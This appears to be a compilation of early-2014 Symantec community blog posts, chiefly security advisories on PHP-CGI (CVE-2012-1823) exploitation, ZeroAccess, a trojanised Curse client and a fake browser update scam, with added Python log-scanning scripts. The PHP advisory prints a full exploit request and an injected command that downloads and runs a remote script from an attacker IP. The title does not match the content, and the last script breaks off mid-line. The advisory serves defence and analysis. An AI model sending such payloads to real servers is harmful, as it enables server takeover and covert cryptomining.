
My note on how to accelerate Oracle with Symantec Storage Foundation using proper storage tiering with SmartTier and SmartIO


Accelerate Oracle with Symantec Storage Foundation


Protecting the Next Flood of Information


At Symantec, we make the world a safer place by helping people, businesses, and governments protect and manage their information, so they can focus on achieving their goals.

And protecting information is becoming an ever-greater challenge as the amount dramatically increases and it’s stored in a growing number of locations.

The flood of information is just starting: IDC in its Digital Universe study predicts that there will be 40 Zettabytes of data by 2020. As a comparison, there are only 1.3 Zetta liters of water stored in all of the earth’s oceans. There will be only 1.5 Zetta seconds that tick by during the course of 50 billion years. We are creating and storing an incomprehensible amount of information.

Symantec’s strategy is simple – we will protect, secure and manage our customers’ information wherever it lives. And as more and more information is stored in and delivered from the cloud, Symantec is there to protect it.

We know the approach to securing information must change. Security can no longer be about running numerous point products. Customers want unified security – security that’s multi-tier, multi-layer, integrated and automated – all delivered as a service. Unified security enables visibility into an organization’s compliance and security posture, giving an enterprise the ability to:

  • take a risk-based approach to identify and protect their most important assets
  • keep the bad guys out
  • minimize the impact of a cybersecurity event
  • respond and recover quickly

Unified security means big data security intelligence delivered from the cloud, leveraging telemetry from millions of mobile endpoints – to be able to protect information from the most advanced threats. Symantec is there today.

And to truly secure, manage and derive value from this mountain of information, we need to better understand it by leveraging meta-data and analytics. Enterprise information is stored in isolated repositories that are secured and managed separately – and this just gets harder with information moving to a variety of clouds. These silos of information must be tied together into an information fabric. This information fabric will enable businesses to have a consistent view across their information tier, to be able to create the right policies around their information and to be able to efficiently store and deliver their information assets.

As Symantec executes on our strategy to provide unified security and information fabric into our customers’ evolving hybrid cloud environments, we are already delivering a comprehensive set of cloud services from across our portfolio including:

  • Symantec’s Email Security.cloud and Enterprise Vault.cloud enable our customers to secure, store, manage and discover their business-critical information.
  • Symantec’s Web Site Security Solutions put the “s” in https – we deliver SSL, certificate management, vulnerability assessment and malware scanning from the Symantec cloud.
  • Symantec’s digital certificate-based trust services support over 200 million devices, including cable set-top boxes, delivered and managed from our cloud-based platform.
  • Symantec VIP is our cloud-based strong authentication service that enables secure access to networks and applications while preventing access by malicious unauthorized attackers.
  • Symantec protects our consumer customers’ data by backing up more than 120 petabytes in our Norton backup cloud.
  • Norton Zone is our cloud-based secure sync and share platform – which allows users to easily share files and folders protected by high-level, industrial-grade encryption both during transfer and while stored in our secure data centers.
  • Symantec and Microsoft have a joint effort to deliver Disaster Recovery as a Service (DRaaS), leveraging Symantec data replication and failover management to Microsoft's Azure cloud services.
  • Symantec is building a next generation cloud platform and hiring top-tier talent, including SVP of cloud platform engineering Stephen McHenry from Google.

Cloud is infused in everything we do. As the nature of cloud computing matures, it’s less about the “cloud” and more about the secure delivery of powerful services. The world will continue to become more complex; Symantec is dedicated to working with partners to build rich ecosystems to protect and manage our customers’ information.

 

Top Viewed Content in 2013: Storage and Clustering Community


IoT and the problem of identity


Identity management was never easy. The basic need for identity is that of ‘non-repudiation’ - assurance that a person is who they say they are - as used to authenticate and authorise individuals to use IT resources, or enable access to web sites and services.

Things such as login names, PINs and passwords are examples of mechanisms that allow us to establish digital ‘identity’ today. For computer users and system managers, the difficulty has always been keeping tabs on all the different login details, number-generating dongles, swipe cards and so on. The domain of "identity management" (the umbrella term for tools that help manage multiple identities across multiple systems) is focused on helping with these issues.

So far so good, but I’m wondering if these ideas are thrown out of the window by the current trend - the Internet of Things (IoT), which enables a wide variety of devices and physical objects to connect to the Internet.

For a start, the establishing of "identity" is undergoing a significant evolution, as illustrated by the term ‘the quantified self’. This term is being used to describe (for example) always-on fitness and personal monitoring devices. They are "connected" and they know who we are, but they do not require a traditional "log in". If these technologies know who we are, what is to stop them telling another computer system who we are, or somebody else tracking our movements?

To take things one step further, with IoT it isn’t just people who need to be identified, but a wide array of other physical objects (from cars to fridges, from training shoes to toasters). To take a not-so-farfetched example, systems now exist to monitor livestock in the fields and identify potential disease symptoms. A farmer will, however, want to be sure that the cows being monitored actually belong to the right farm and, equally, that the mechanisms involved aren’t being used to hack into the farm’s computer systems.

As we connect things to the Internet, then, we also need ways of ensuring they are what they say they are. This creates a new challenge - which is how to manage the identities of all the devices we are in the process of creating, in all their scenarios, shapes and sizes. No, identity management was never easy. But it looks set to become even harder (most commentators predict that, by 2020, over 20 billion devices will be connected to the internet, over two times the human population on earth at that time).

Symantec is excited about this area because we have spent the past few years building technical assets that could really help to solve this problem. By combining the user authentication, end-point security, device management and global intelligence assets, we plan to stay ahead of the game here and provide services that can help to make IoT a productive and secure reality.

PHP Inclusion Activity


Since the 14th of December, the SOC has noticed a substantial increase in the quantity of PHP code inclusion attacks against MSS customers. Specifically, attempts to compromise and infect internet facing webservers by injecting malicious PHP code have been observed. While the primary vulnerability being targeted (CVE-2012-1823) isn’t new, a significant uptick in attempts to exploit it is worthy of note. Proof of concept exploit code has been publicly available for some time. At this time, it appears that only Linux webservers running out of date versions of PHP are vulnerable.

php-attack-blog-1.png

At the time of this post, more than sixty SOC customers have been affected by these exploit attempts. There is no clear correlation between this activity and any individual industry vertical, with customers in health, financial, telecommunications, local government, and more being affected.

The main driver behind these exploits is to compromise and infect the victim webserver for financial gain. Binaries were extracted from the malicious servers utilized in the attack, revealing primarily bitcoin mining malware. Bitcoins are a virtual currency which is generated based on mathematical operations known as ‘mining’ on computer hardware. Attackers often infect machines with the intent of using them to generate bitcoins for financial gain.

More than 1,000 sources have been observed participating in this exploit activity since the initial increase was noted. There’s no clear trend or geographic breakdown of source addresses that would lend itself to attribution. Due to the nature of the attack, return traffic to the source host is not required. Redirection information is contained in the original exploit attempt, leading us to believe that source IP information has been spoofed. Identical exploit strings have been observed from numerous source addresses, further indicating spoofed activity.

Analysis:

Below is an example of one of several observed packages surrounding these exploit attempts. Other samples encountered during our research perform similar actions.

Example inbound traffic

POST /cgi-bin/php.cgi?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1

Host: [victim server IP]

User-Agent: Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25

Content-Type: application/x-www-form-urlencoded

Content-Length: 84

Connection: close

<?php system("wget http://74.208.228[.]113/a  -O /tmp/sh;sh /tmp/sh;rm -rf /tmp/sh");

Translation

  1. A percent-encoded hex POST request is passed to the victim server attempting to exploit the vulnerability, followed by PHP containing shell commands.
  • Decoded POST (each "+" in the encoded request decodes to a space, so the query string becomes a list of php-cgi command-line options):

POST /cgi-bin/php.cgi?-d allow_url_include=on -d safe_mode=off -d suhosin.simulation=on -d disable_functions="" -d open_basedir=none -d auto_prepend_file=php://input -d cgi.force_redirect=0 -d cgi.redirect_status_env=0 -n

  2. The injected commands (if successfully executed by the victim server) will download, execute, and subsequently delete a malicious script designed to infect the victim.
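As an added example (not code from the original post), the following Python decodes request targets from web server access log lines the way php-cgi sees them and flags requests whose query string decodes into php-cgi options, as in the percent-encoded POST above; because the sample is encoded byte-for-byte, matching on the raw request line would miss it. The log lines, client addresses and timestamps are constructed, and the php-cgi path pattern is an assumption.

```python
"""Flag CVE-2012-1823-style php-cgi argument injection in access log lines.

Added example, not code from the original post. The POST target below is the
one shown in the post; the log lines around it (addresses, timestamps, the
benign requests) are constructed.
"""
import re
from urllib.parse import unquote_plus, urlsplit

# php.ini directives the sample request sets via '-d' so that the POST body
# (php://input) is prepended to, and executed as, the script.
DANGEROUS_DIRECTIVES = (
    "allow_url_include",
    "auto_prepend_file",
    "cgi.force_redirect",
    "cgi.redirect_status_env",
    "disable_functions",
    "open_basedir",
    "safe_mode",
)

# Assumption: php-cgi is exposed under one of its usual names, e.g. /cgi-bin/php.cgi.
PHP_CGI_PATH = re.compile(r"/php[0-9]*(?:-cgi|\.cgi)$")

# Apache common/combined log format; only the client address and request line are used.
LOG_RE = re.compile(r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)"')

# Request target from the post, exactly as it appears on the wire.
POST_TARGET = (
    "/cgi-bin/php.cgi?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E"
    "+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66"
    "+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E"
    "+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22"
    "+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65"
    "+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74"
    "+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30"
    "+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30"
    "+%2D%6E"
)

# Constructed log lines. The post notes the source addresses of this activity are
# likely spoofed, so the address is useful for triage, not for blocking.
SAMPLE_LOG = [
    f'198.51.100.7 - - [14/Dec/2013:03:14:15 +0000] "POST {POST_TARGET} HTTP/1.1" 200 84',
    # Benign: a '-' inside a value and a plain parameter aimed at php-cgi are not options.
    '203.0.113.5 - - [14/Dec/2013:03:14:16 +0000] "GET /index.php?page=news&sort=-date HTTP/1.1" 200 5120',
    '203.0.113.8 - - [14/Dec/2013:03:15:01 +0000] "GET /cgi-bin/php.cgi?id=7 HTTP/1.1" 200 640',
]


def decode_query(target: str) -> str:
    """Percent-decode the query string of a request target, treating '+' as space."""
    return unquote_plus(urlsplit(target).query)


def option_tokens(target: str) -> list:
    """Return the tokens of the decoded query that look like php-cgi options ('-d', '-n', ...).

    php-cgi receives an 'indexed' query (one with no literal '=') as its argv, so a
    query that decodes to whitespace-separated tokens beginning with '-' is the
    shape of the attack regardless of which directives follow.
    """
    return [tok for tok in decode_query(target).split() if tok.startswith("-")]


def directives_set(target: str) -> list:
    """Return the dangerous php.ini directives assigned ('name=...') in the decoded query."""
    decoded = decode_query(target)
    return [d for d in DANGEROUS_DIRECTIVES if re.search(r"\b" + re.escape(d) + "=", decoded)]


def classify(target: str):
    """Return (is_attack, directives).

    A request is flagged when its query decodes to php-cgi options and either
    names a dangerous directive or is aimed at a php-cgi binary.
    """
    opts = option_tokens(target)
    directives = directives_set(target)
    aimed_at_php_cgi = PHP_CGI_PATH.search(urlsplit(target).path) is not None
    return bool(opts) and (bool(directives) or aimed_at_php_cgi), directives


def scan_log(lines):
    """Return one dict per flagged line: client address, method, decoded query, directives."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = m.group("req").split(" ")
        if len(parts) < 2:
            continue
        method, target = parts[0], parts[1]
        is_attack, directives = classify(target)
        if is_attack:
            hits.append({
                "src": m.group("src"),
                "method": method,
                "decoded_query": decode_query(target),
                "directives": directives,
            })
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f"{hit['src']} {hit['method']} directives={','.join(hit['directives'])}")
        print("  decoded:", hit["decoded_query"])
```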

At this point, the following files are downloaded and various steps are taken on the system. These steps include execution of additional malware (ELF executables), the addition of a cron job to ensure some form of persistence, and various process + file maintenance actions.

File Name   MD5                                 Description
a           d3754d4869164df4a6307d48d30752e6    Shell script, initial activity
update      7bb7dc624a19ed58fa9a0fdb30752098    Shell script, update routine
sh          83aa145f8b12365ca7ce37f0b03bf745    Bitcoin miner/trojan
clamav      8bcf90e5f865acd004a43f2ba891534b    Bitcoin miner/trojan

VirusTotal Anti-Virus Detect Rate

File Name   MD5                                 Detection rate
sh          83aa145f8b12365ca7ce37f0b03bf745    6/49
clamav      8bcf90e5f865acd004a43f2ba891534b    11/49

php-attack-blog-2.png

A list of the files retrieved in this particular PHP exploit along with details and MD5 hashes.

php-attack-blog-3.png

The initial redirect contained inside the exploit leads to this script, which is downloaded and executed if the victim machine is vulnerable. This process sets up an “update” cron job (see below) as well as downloading and executing the core Bitcoin mining binaries. Notice the Stratum traffic to port 3333/TCP; Stratum is a well-known Bitcoin mining protocol.

php-attack-blog-4.png

Contents of the “update” script. This process attempts to maintain persistence on the victim machine by re-running the initial “a” script if an existing malicious connection isn’t already open.

Impact and MSS detection:

At first glance, the intent of this exploit and infection activity isn’t to damage or steal information from victim webservers. The role of Bitcoin mining in this scenario is to harness the victim’s computational resources to financially benefit the perpetrators. The victim systems in this situation have been wrongfully hijacked and pressed into service, which may cause slowdowns for legitimate users and resource issues for server owners. Due to the persistent nature and continuous “phone home” tendencies of these infections, additional malicious action could be taken on infected machines in the future.

We believe the activity highlighted in this report is related to a worm detailed in the following Symantec write-up: http://www.symantec.com/connect/blogs/linux-worm-targeting-hidden-devices

Currently, MSS has coverage for this initial exploit activity via most IDS vendors, including Sourcefire, Cisco, Palo Alto, Emerging Threats, and more. Based on samples extracted and observed infections, additional post-compromise IP and URL based MSS signatures are in place across our entire customer base. At this stage, customers will be alerted to both exploit and compromise activity.

If you have any questions or concerns about the activity covered in this post, please contact the SOC via phone, portal chat, or email (analysis@monitoredsecurity.com).

Making Enterprise Vault More Secure


From time to time people ask how to make Enterprise Vault data 'more secure'. This is usually about the under-the-covers activities: for example, when a client retrieves an archived item and it's transmitted back to the client, can that be secured? The answer is yes, so let's discuss how.

First of all, the default transmission is HTTP.

HTTP.png

And as you can see in Enterprise Vault 10.0.4 (and other flavours of EV too) you get a security warning, which when clicked, gives you a simple pop-up which says:

"Non-HTTPS traffic is not encrypted on the network. Do not use this option unless you are using a secure network".

The second thing to notice is that this is a site wide setting.

So, life is good if we are using a secure network. I know that there are philosophical discussions to be had about whether ANY network can be termed secure, but for now let's just say that if all traffic is inside the corporate firewall it's secure.

But what about people who use Outlook Web Access?

This is a problem if Enterprise Vault is configured with Outlook Web Access extensions. Users can access Outlook Web Access from 'anywhere'. Therefore, when they retrieve an archived item, or perform a search and so on, the transmission, by default, is not going to be secure.

We need to change to HTTPS. For this there are two considerations:

Green Field

In a green field deployment, or in other words a fresh deployment of Enterprise Vault, HTTPS can be enabled and configured from Day 1... before ANYTHING is archived. This is of course the ideal situation.

Brown Field

The brown field deployment, or in other words an existing deployment of Enterprise Vault, can also be changed to use HTTPS. No problem there; except of course that all the existing shortcuts will then be broken. So if you do go down this route, you will need to take a look at the options for recreating Enterprise Vault shortcuts, which I've written about before in this blog post (http://thingsilearnedtoday.net/2013/12/17/how-to-r...). It might not be necessary to perform those steps though, for example if archived items do not have shortcuts created at all (good for customers who push Virtual Vault usage).

Remember

It's also worth remembering that you don't just make this change in Enterprise Vault: as the online help explains, you also have to obtain and install a valid certificate on the default web site in IIS.

Do you use HTTP or HTTPS in your Enterprise Vault deployment? Let me know in the comments.

 

Transformational Smart Cities: cyber security and resilience


Smart cities are on the increase worldwide and, especially within Europe, there are many such initiatives being stimulated by the EC and national governments. Local administrators and policy makers are under great pressure to make their cities increasingly competitive, in order to attract businesses, talent and taxpayers – and to comply with sustainable policies, greenhouse gas emission targets and carbon footprint guidelines.

What will they look like? In the main, smart city deployments will be multi-faceted, carried out by a diverse ecosystem of providers in innovative domains, involving state-of-the-art technology, including critical and complex ICT implementations. These deployments can address different components and city systems, such as Intelligent Transportation, Connected Healthcare, Public Safety and Security, Emergency Services, Smart Grid and Smart Metering, Intelligent Buildings, etc.

At the same time, increasing ICT complexity, hyper-connectivity, namely through ‘Internet of Things’ environments, as well as the generation of significant amounts of data,  will also mean increasing vulnerability, both to malicious attacks and unintentional incidents. By conceiving interconnected urban systems with security and information protection in mind and already built in, city administrators will be able to ensure service continuity, safety and well-being for citizens and businesses alike.

A centralised governance body will ultimately run the smart city through a central virtual dashboard, comprising the ICT operational centre – and that is a massive undertaking. It will demand constant ongoing assessment and timely response to a whole range of incidents and needs. Against this complex and challenging backdrop, how exactly do you safeguard the connected smart city? This is where threat intelligence services come into play. With the right services partner’s systems in place, any threat to the security of the system and its information can be detected, analysed and dealt with. The ICT operational centre will be able to obtain reliable threat and vulnerability intelligence, and consequently dynamically adjust its security stance.

Moreover, where incidents occur, these need to be promptly and effectively managed by specialist operators and incident management tools, in order to return users and services to their normal operational status.

Against a threat landscape that is growing in intensity and sophistication, having an effective strategy to combat such attacks has become an integral consideration in the private sector boardroom and for policy-making within the public sector – because public administrators know that any serious incident or breach could result in devastating outcomes, in terms of financial, data, credibility and reputational loss or damage.

That is why choosing reputable, experienced thought leaders as partners in conceiving such complex developments is an important step in the right direction towards building resilient smart cities that will stand the test of time and set new benchmarks in urban development. With so much at stake, there really is no room for compromise when it comes to ensuring that these cities of the future enjoy the highest possible levels of protection.

For a more comprehensive approach, download the Executive Report, ‘Transformational Smart Cities: cyber security and resilience’, here: http://bit.ly/1fpsBpF

DeepSight Portal Updates now available!


You spoke up, we listened! We know that information is only as useful as it is easy to find, access, and use – especially security intelligence. It’s our goal to continue to make it easier for the right team members to get the right information quickly. Thanks to input from our faithful customers, we have added the following new functionality to the DeepSight portal:

  • Groups – now user administrators can create groups within their organization, assign vulnerabilities to people within those groups, and create reports by individuals within the group to improve the activity tracking
  • ‘Cloning’ a current account – to save time in setup for a new user, customers can now clone an existing account with all the privileges of another user, and then simply specify the contact information
  • Introducing workflow tracking – when a user wants to assign alerts and review the activity on that alert, we can now track and report on this throughout the remediation
  • New communication streams – publication of system messages/service alerts to the home page, for all customers including DataFeed customers
  • Additional information for IP lookups – we’ve added the attack signatures seen, the URLs, and the ports used to help the user understand the attack methodology
  • Additional Mobile operating systems – customers can specify mobile as a category under the monitor generation - we know Mobile is a hot topic!
  • Improved Search function – now keywords will look through all areas of DeepSight including .pdfs, to make it easier for customers to find topics of interest or concern
  • Bulk uploads – in order to support multi-national and larger conglomerates with multiple domains and URLs, we now support csv in our DeepSight alerts configuration

We appreciate the good feedback we’ve received since rolling out our new DeepSight Portal features in April 2013, and appreciate the continued idea exchange with our users. Together we will continue to improve the best Security Intelligence program in today’s market!


Gauging interest - Server Management Suite specific knowledge sharing sessions


 

We recently held our first User Group Summit with 75 customers representing 28 different User Groups.  We also had several Symantec employees in attendance to network, field questions, share ideas, etc. 

One of the valuable interactions we had came from a Server Management Suite discussion table held at lunch.  There was interest expressed from several folks around getting together more often to share insights and best practices around Server Management Suite specifically.  Some of the customers even offered to present some of this information. 

We’d like to gauge interest around holding these sessions around Server Management Suite in 2014.  Please reply to this blog or send me an email at ryan_terry@symantec.com and offer your thoughts regarding the following questions:

  • How often would you like to meet virtually to discuss best practices around Server Management Suite in 2014? Example: once, twice, quarterly, etc.
  • What topics would you like to discuss?
  • Are you willing to share your insights and experience? If so, what topic(s) will you share?
  • Any other thoughts or ideas you'd like me to consider with regards to this idea

Thank you for your help to make the Server Management Suite experience better!

Happy New Year from Symantec's Corporate Responsibility Team!


2013 was an eventful and exciting year here at Symantec, much of which we’ve documented using this space. While we’re all hard at work planning for our Fiscal Year 2015, which begins in April, January presents us with a great time to pause and look back at all the great things we’ve featured on the blog in 2013.

As the administrator of this space, I’m always amazed by the great stories our guest authors share. Here, a few of my favorites from 2013:

  1. In March, we were named one of the World’s Most Ethical Companies for the sixth year in a row. While the company always holds this designation in great regard, this year Scott Taylor, our Executive Vice President, General Counsel and Secretary, used this space to talk about what it really means to be an ethical company on a day-to-day basis at Symantec, and why the designation is meaningful.
  2. Early in the year, we announced grants totalling $1 million to education organizations around the globe. Some of these partners were new, and some were existing partnerships that we were looking to take to the next level. All of them are integral parts of helping to create the next generation of innovators.
  3. In April, our CEO, Steve Bennett, blogged about the fact that our global employee base increased their volunteer hours by over 40 percent fiscal-year-over-fiscal year. The fact that our CEO celebrates this as a significant company accomplishment speaks volumes to me, as an employee, about the credibility of our corporate messaging around employee engagement and satisfaction.
  4. For National Cyber Security Awareness Month in October, Internet Safety Advocate Marian Merritt wrote about best practices for keeping your child safe on mobile technology. This was a great example of how Symantec can apply its core business strengths to help protect society, but this piece also spoke strongly to me as a parent. It provides straight-forward, commonsense advice that I can immediately apply to my life.
  5. Last month, Father Jeff Putthoff, Executive Director of Hopeworks ‘N Camden, blogged about Hopeworks’ and Symantec’s long-standing partnership to provide job skills and education assistance to youth. Hopeworks is doing important work in Camden, and I love the grassroots genesis of this partnership, and the dedication of our employees who support these efforts year after year.

What are your favorites? I’d love to hear from you!

 

Lora Phillips is Symantec's Senior Manager, Global Corporate Responsibility.

Is this the end of ZeroAccess botnet?


It appears so. The ZeroAccess botnet, responsible for infecting around 2 million computers worldwide, was aimed at making money through pay-per-click advertising. It is also known to have been able to download other threats, such as misleading applications, onto compromised machines, and it would download additional software in order to mine bitcoin currency. While the malicious activity was in progress, Trojan.Zeroaccess would hide itself with the help of a very advanced rootkit.

Already in July 2013, Symantec Security Response engineers managed to "sinkhole" over 25% of botnet machines, following an extensive study of how the bots communicate. Making use of a weakness in the ZeroAccess P2P mechanism, ca. 500k machines were freed from the botnet. In the meantime, the botnet creators distributed a new version of ZeroAccess that addressed the design flaw that had been found. More information about the Symantec Security Response study and operation may be found here:

Grappling with the ZeroAccess Botnet

https://www-secure.symantec.com/connect/blogs/grappling-zeroaccess-botnet

 

In December 2013, the Microsoft Digital Crimes Unit filed its civil case in the U.S. District Court for the Western District of Texas against the ZeroAccess botnet. It also received authorization from the Court to block incoming and outgoing traffic between computers in the US and 18 identified IP addresses being used for fraudulent actions. Microsoft also took control of 49 domains associated with the ZeroAccess botnet. Microsoft's actions were coordinated with the Europol law enforcement agency to execute search warrants on the identified IP addresses in Europe.

As Microsoft suggested, the aim of the action was not to fully eliminate the botnet, due to its complexity, but to "disrupt its operations significantly", and this seems to have worked really well: since all the measures taken in December, no new ZeroAccess code has been released by the malware authors. It also seems the bot-herders have halted their actions, seeding a "White Flag" in the code of one of the last updates sent to infected computers, which may suggest they have decided to give up control of the botnet for good.

Recent SophosLabs studies, published just this week, also show no growth in the size of the botnet and even indicate a complete stop in the number of new droppers. Together with the dropping number of ZeroAccess detections, this would suggest a significant success of the worldwide actions against the botnet. The coming months will show whether this is the end, or whether we see any evolution of this threat.

 

References:

Microsoft, the FBI, Europol and industry partners disrupt the notorious ZeroAccess botnet
http://www.microsoft.com/en-us/news/press/2013/dec13/12-05zeroaccessbotnetpr.aspx

ZeroAccess criminals wave white flag: The impact of partnerships on cybercrime
http://blogs.technet.com/b/microsoft_blog/archive/2013/12/19/zeroaccess-criminals-wave-white-flag-the-impact-of-partnerships-on-cybercrime.aspx

Microsoft and partners fight back against the ZeroAccess botnet
http://nakedsecurity.sophos.com/2013/12/06/microsoft-and-partners-take-down-zeroaccess-botnet

Have we seen the end of the ZeroAccess botnet?
http://nakedsecurity.sophos.com/2014/01/07/have-we-seen-the-end-of-the-zeroaccess-botnet

 

Fake Curse client stealing WOW's user credentials


In a recent "sticky" thread on the Battle.net forums, a new threat targeting WoW players has been reported. The Trojan "Disker" is able to compromise even accounts using Authenticator protection: it steals both the account credentials and the Authenticator password. To verify whether a machine has been compromised by the trojan, it is advised to create an MSinfo file and check it for the following entries in the Startup Programs section:

Disker rundll32.exe c:\users\name\appdata\local\temp\w_win.dll,dw Name-PC\Name Startup
Disker64 rundll32.exe c:\users\name\appdata\local\temp\w_64.dll,dw Name-PC\Name Startup

The Trojan originates from a fake Curse website offering malicious Curse clients for download; the website itself has recently been popping up on major search engines when searching for the phrase "curse client".

Blizzard advises reporting any compromised account directly, along with information regarding installed addons or plugins. As a general note, deleting any recently downloaded addons and running a full system scan are recommended.

 

References:

(Sticky) *Compromised accounts* Potential Trojan
http://us.battle.net/wow/en/forum/topic/11041384892

WoW gamers targeted with trojanized Curse client
http://www.net-security.org/malware_news.php?id=2666

Connect Dev Notes: 08 Jan 2013


Updates deployed to the Connect production servers as a result of the code sprint that ended 07 January 2014.

User Facing: Desktop

  • Added the ability for users to browse from one unread post in their groups to the next (or previous) unread post in their groups. To see this feature in action, 1. Log in; 2. Choose "My Unread" under the Account menu; 3. Click a post title; 4. From the post click the "NEXT UNREAD" button. (See attached next-unread-in-groups.png)
  • Added the ability for bloggers to add subtitles to their blog posts.
  • Added the ability for blog administrators to add a list of recent blog posts to the right column of their blog pages.
  • Added the ability for blog administrators to add a Facebook Activity box to the right column of their blog pages. This activity box pulls updates from a targeted Facebook account and lists them on the relevant blog pages.
  • Removed the "Mark as solution" links from forum threads that are flagged as "for information only -- no solution required."
  • Fixed an issue with an update script we ran on November 13 changing the post dates of legacy blog posts. All posts are now (correctly) displaying their expected post dates.
  • Fixed an issue with the wrong solution provider being identified in notification emails that are sent when a post is marked as solved. These notifications now identify the solution provider correctly.
  • Merged the Symantec Management Platform (Notification Server) NS 7.x and SMP 7.x tags into a single Symantec Management Platform (Notification Server) 7.x tag. Updated all the content tagged with the legacy tags to use the new one.

Admin Facing

  • Updated code that manages solved forum posts to not display pending split-solution posts in the "Can you solve this?" list -- since, pending final approval, these posts have been solved.

SEO Wins

  • Added schema.org metadata to article, blog, and event entries so they can be better recognized and indexed by major search providers. Search engines including Bing, Google, Yahoo! and Yandex rely on this markup to improve the display of search results, making it easier for people to find the right web pages.

Fake Browser Update Site Installs Malware


In the first week of 2014, we came across a website using tried and tested social engineering techniques to coerce victims into installing malware. The domain http://newyear[REMOVED]fix.com was registered on December 30, 2013. Based on our research, 94 percent of attacks appear to be targeting users based in the United Kingdom through advertising networks and free movie streaming and media sites.

The attackers attempt to trick victims using the following techniques:

  • A URL containing the words “new year” and “fix”
  • A professional looking template (from Google, Microsoft or Mozilla) telling the victim that a critical update is necessary for their system to function properly
  • Redirecting the user, based on their browser type, to a fake but convincing Chrome, Firefox, or Internet Explorer Web page.
  • Using a JavaScript loop to force the victim to give up and stay on site – users have to click on the “Yes/No” option 100 times in order to close the browser.

This particular social engineering attack is not novel, and plays on victims’ fear of needing to install urgent updates. Since the domain was registered only last week, it appears the attacker thought of this scheme at the very last minute, as the holiday season starts winding down.

The website, which is hosted in Ukraine, uses a dual hybrid Web server set up with Apache and Nginx, with the latter identifying the victim’s browser and performing the redirect.

The user will see the Google Chrome, Mozilla Firefox, and Microsoft Internet Explorer templates, shown in Figures 1 to 3, based on the type of browser they are using.

Fake Browser Update 1.png

Figure 1. Page displayed to Chrome users

Fake Browser Update 2.png

Figure 2. Page displayed to Firefox users

Fake Browser Update 3.png

Figure 3. Page displayed to Internet Explorer users

Fake Browser Update 4.png

Figure 4. JavaScript loop button which requires 100 clicks to close

At the time of this blog post, the Internet Explorer version of the Web page is no longer functional. The Chrome download page serves up Chromeupdate.exe while the Firefox download page serves up Firefoxupdate.exe.

Both of these samples are detected by Symantec as Trojan.Shylock. Symantec also has the following IPS coverage in place for this attack:

Web Attack: Fake Software Update Website

To stay protected against this type of threat, Symantec recommends that users:

  • Keep antivirus definitions, operating systems, and software up-to-date.
  • Exercise caution when clicking on enticing links sent through emails, messaging services, or on social networks.
  • Only download files from trusted and legitimate sources.
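
The post names the two payload filenames (Chromeupdate.exe and Firefoxupdate.exe) and a domain built from the lure words "new year" and "fix". An added example of turning those observations into proxy-log triage follows; it is not code from Symantec or the post. It scans constructed log lines for executable downloads whose filename names a browser but whose host is not one of the browser vendor's own download hosts, and separately flags hosts carrying the campaign's lure words. The vendor allowlist, the log format and the stand-in host newyear-fix.example (in place of the redacted domain) are assumptions.

```python
"""Triage proxy log lines for executable downloads that pose as browser
updates but are served from hosts other than the browser vendor's own."""
import re
from typing import Dict, List, Optional
from urllib.parse import urlparse

# Constructed proxy log (not real traffic). Fields: time, client, method,
# URL, status, content type. newyear-fix.example stands in for the
# redacted newyear[REMOVED]fix.com domain named in the post.
SAMPLE_PROXY_LOG = """\
2014-01-07T10:12:03Z 10.0.0.5 GET http://newyear-fix.example/ 200 text/html
2014-01-07T10:12:09Z 10.0.0.5 GET http://newyear-fix.example/chrome/Chromeupdate.exe 200 application/octet-stream
2014-01-07T10:15:41Z 10.0.0.9 GET http://newyear-fix.example/firefox/Firefoxupdate.exe 200 application/x-msdownload
2014-01-07T10:20:00Z 10.0.0.7 GET https://dl.google.com/chrome/install/ChromeSetup.exe 200 application/octet-stream
2014-01-07T10:22:15Z 10.0.0.7 GET http://cdn.example.net/js/app.js 200 application/javascript
2014-01-07T10:25:30Z 10.0.0.9 GET http://files.example.org/tools/update.exe 200 application/octet-stream
"""

# Illustrative allowlist (assumption): hosts from which each vendor
# distributes its own browser installer. Extend it for your environment.
VENDOR_HOSTS = {
    "chrome": ("dl.google.com", "google.com"),
    "firefox": ("download.mozilla.org", "mozilla.org"),
}

# Filename tokens that make an executable look like a browser installer/updater.
BRAND_PATTERNS = {
    "chrome": re.compile(r"chrome", re.IGNORECASE),
    "firefox": re.compile(r"firefox", re.IGNORECASE),
}

# Lure words from the campaign described in the post; tune per campaign,
# since short words such as "fix" will also appear in benign host names.
LURE_WORDS = ("newyear", "fix")

EXECUTABLE_EXT = (".exe", ".msi", ".scr")

LOG_LINE = re.compile(
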